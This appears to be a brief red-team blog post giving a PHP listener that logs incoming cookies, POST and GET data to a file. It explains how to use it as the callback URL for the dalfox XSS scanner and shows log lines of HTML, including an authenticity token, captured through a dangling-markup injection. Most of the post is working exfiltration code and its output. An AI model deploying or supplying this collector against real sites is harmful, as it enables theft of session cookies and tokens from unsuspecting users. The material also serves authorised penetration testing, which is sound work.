Write a quick and dirty PHP callback listener for cookies and session data

DJ SUBSTANCE
2 min readApr 27, 2024

--


░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓██████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓███████▓▒░ ░▒▓██████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓████████▓▒░▒▓███████▓▒░ ░▒▓█▓▒░ ░▒▓████████▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░ ░▒▓███████▓▒░
░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓████████▓▒░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░

Embedded Parameter Check:
Added a check for the 'embedded' parameter within
the $_GET array before trying to access it. This prevents PHP errors if
the parameter isn’t provided.

Log Structure: The $logData array now encapsulates all potential inputs
($_COOKIE, $_POST, $_GET) which can dynamically include data based on
what's sent to the server. The inclusion of 'embedded' is only done if
it's actually set.

Logging Format: Ensured the log format is consistent, appending a newline
after each entry to keep the log file organized.

Security and Handling: The script assumes a basic level of security
handling given your setup (i.e., using 'Origin' set on the server).

In Burp or curl send in the request: "Origin: https://yourserver.com"
Rename callback.php to index.php so it collects all data when referenced
make sure http and https both work
make sure logs.txt is writable


This is what you want to specify in scripts like 'dalfox' when it asks for
a callback url

<?php

// Define the log file path
$logFilePath = 'log.txt';

// Initialize an array to store the log data
$logData = array();

// Check if there are cookies and log them
if (!empty($_COOKIE)) {
$logData['cookies'] = $_COOKIE;
}

// Check if the request method is POST and log POST data
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$logData['postData'] = $_POST;
}

// Check if there are any GET parameters and log them
if (!empty($_GET)) {
$logData['getData'] = $_GET;

// Check if 'embedded' GET parameter is set
if (isset($_GET['embedded'])) {
$logData['embedded'] = $_GET['embedded'];
}
}

// Prepare the log string with timestamp
$timeStamp = date('Y-m-d H:i:s');
$logString = "$timeStamp - " . json_encode($logData);

// Write the data to the log file
file_put_contents($logFilePath, $logString . "\n", FILE_APPEND);

// Optional: Send a response back to the client
echo "Data received and logged.";

?>

-----
touch log.txt
chmod +w log.txt
chown www-data:www-data *

... Example. tail -f log.txt
2024-04-27 22:48:41 - {"getData":
{"embed":"xyz<!-- '\"` --><!-- <\/textarea><\/xmp> --><\/option><\/form>
<form data-turbo=\"false\" action=\"\/session\" accept-charset=\"UTF-8\"
method=\"post\"><input type=\"hidden\" name=\"authenticity_token\"
value=\"piSGc09Fs5v1AWhPpLDekr_K4PJs4pfoUGoR_AEtOOkiy5AQDIAZfBwdVj<snip>0I8DT_xZ9Vw\" \/> <label for=\"login_field\">"}}

2024-04-27 22:48:41 - {"getData":
{"embed":"xyz<!-- '\"` --><!-- <\/textarea><\/xmp> --><\/option><\/form><form data-turbo=\"false\"
action=\"\/session\" accept-charset=\"UTF-8\" method=\"post\">
<input type=\"hidden\" name=\"authenticity_token\"
value=\"piSGc09Fs5v1AWhPpLDekr_K4PJs4pfoUGoR_AEtOOki<snip>lM30I8DT_xZ9Vw\" \/>
<label for=\"login_field\">"}}



Once you determine what values your trying to collect, modify the php script.

https://github.com/djsubstance

-substance

--

--

DJ SUBSTANCE
DJ SUBSTANCE

Written by DJ SUBSTANCE

twenty years professionally as a Network Engineer, more recently I have focused on red teaming mostly, but I am always up for learning and exchanging info

No responses yet